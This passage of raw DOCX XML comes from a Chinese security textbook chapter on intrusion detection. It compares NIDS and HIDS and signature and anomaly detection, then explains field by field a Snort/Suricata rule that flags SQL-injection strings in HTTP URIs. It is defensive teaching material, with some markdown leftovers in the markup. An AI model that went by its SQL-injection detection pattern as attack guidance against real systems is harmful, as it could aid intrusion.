        <w:t xml:space="preserve">NIDS（Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS，部署在网络咽喉位置，分析镜像流量）和基于主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HIDS（Host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS，部署在关键服务器上，监听系统调用和文件完整性）。本节重点讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的检测原理与规则编写，但读者需在脑中始终保持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的互补性——NIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">善于发现扫描、漏洞利用传输、C2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信标，HIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">善于捕捉提权、后门安装和本地横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的判定逻辑本质上工作在两个正交轴上：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">签名检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">签名检测（Signature-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是流量世界的“病毒特征码匹配”。安全研究员在实验室环境分析某已知攻击的流量模式（典型字节序列、请求结构、协议异常），固化为一组条件规则（Snort/Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则），部署后在全部流量中实时匹配该模式。其优势在于误报率极低（精确匹配已知恶意模式），劣势在于无法检测未知攻击（零日漏洞利用、定制后门协议），且攻击者修改一两个字节就能绕过弱签名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常检测（Anomaly-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">站在签名检测的逻辑对立面。它首先学习“正常”流量基线——包括全网流量峰谷模式、每台服务器的常规服务端口与通信对端、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询频率和域名多样性、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话持续时间分布——然后检测与基线存在显著偏差的行为。异常检测的天然优势在于其不依赖攻击先验知识，理论上能发现零日攻击和内部威胁。但其代价是误报率显著升高：一次计划外的数据迁移或新版软件的上线部署产生的流量突增，在数学模型上与数据外泄几乎无法区分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署几乎普遍采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“签名为主，异常为辅”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的混合架构。签名规则覆盖已知高危害攻击（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、命令注入、已知漏洞利用框架</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的默认载荷指纹——回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch17），确保高精度告警；异常检测作为兜底机制，当某主机的行为模式发生剧烈偏移时发出预警，提示安全分析员关注该主机是否已沦陷。（异常检测模型的阈值和基线需根据实际网络环境持续调优）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="330"/>
    <w:bookmarkStart w:id="331" w:name="snortsuricata-规则结构深度解析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则结构深度解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata（后者是前者的多线程演进版，语法兼容</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则）是目前开源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的事实标准。Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的论文性能评估表明其在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 Gbps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络速度下具有比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">低的丢包率但更高的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消耗，且支持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书日志、HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议深度解析等高级功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则的完整结构如下（真实语法，具体十六进制值已占位）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp $EXTERNAL_NET any -&gt; $HOME_NET $HTTP_PORTS (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg:"WEB-ATTACKS SQL injection attempt detected";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> flow:to_server,established;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> content:"SELECT|20|"; nocase;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> http_uri;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> content:"/*!"; within:10;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> metadata:policy balanced-ips drop, service http;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> reference:url,www.owasp.org/index.php/SQL_Injection;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> classtype:web-application-attack;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> sid:1000001; rev:1;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">逐字段分解：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动作（Action）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示仅记录告警。IPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式下常用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（丢弃匹配的数据包并记录），需配合防火墙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式部署。（具体动作因部署模式和策略而异）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">协议（Protocol）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。也支持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">udp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用层协议关键字）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">源/目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">和端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$EXTERNAL_NET any -&gt; $HOME_NET $HTTP_PORTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$EXTERNAL_NET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$HOME_NET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置文件中的变量，通常将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$HOME_NET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">定义为需要保护的内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网段，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$EXTERNAL_NET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">定义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">!$HOME_NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（非内部即为外部）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$HTTP_PORTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一般定义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**规则选项（Rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Options）**：规则的核心检测逻辑与元数据，由分号分隔的键值对构成。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：告警的人类可读描述。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flow:to_server,established</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅匹配从客户端发往服务器且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接已建立的数据包。此选项排除无意义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包触警和服务器响应包。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">content:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“SELECT|20|”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在数据包载荷中搜索字节序列。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|20|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是空格的十六进制表示，规则引擎将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SELECT 0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">理解为“SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”（注意末尾空格）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nocase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示匹配不区分大小写（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均匹配）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http_uri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的搜索范围限定在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> URI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部分（GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
